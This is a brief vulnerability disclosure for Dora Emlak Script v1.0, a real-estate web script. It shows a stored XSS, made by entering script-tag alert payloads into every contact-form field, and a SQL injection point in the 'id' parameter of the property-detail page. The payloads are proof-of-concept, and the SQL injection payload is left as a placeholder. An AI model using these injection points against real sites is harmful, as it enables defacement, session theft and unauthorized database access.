Dora Emlak Script v1.0 XSS & sql injection Vulnerability.

#Software: Dora Emlak Script v1.0
#download: http://www.aspindir.com/goster/5027
#demo: http://www.fatihkaratas.info/dora/
#Found By: GeFORC3 ( G3 )

#Exploit:

1-http://www.example.com/dora/default.asp?goster=iletisim

You write xss code in  page's text box

Adınız   <script>alert("G3");</script>
Soyadınız  <script>alert("G3");</script>
Mail Adresiniz   <script>alert("G3");</script>
Konu     <script>alert("G3");</script>
Mesajınız   <script>alert("G3");</script>

Press to "gönder"(send) button.

This xss works on Dora Emlak Script v1.0

+

http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL]


WwW.GeFORC3.Org  |  WwW.HeykirBlog.Com  |  WwW.NetKaBus.Com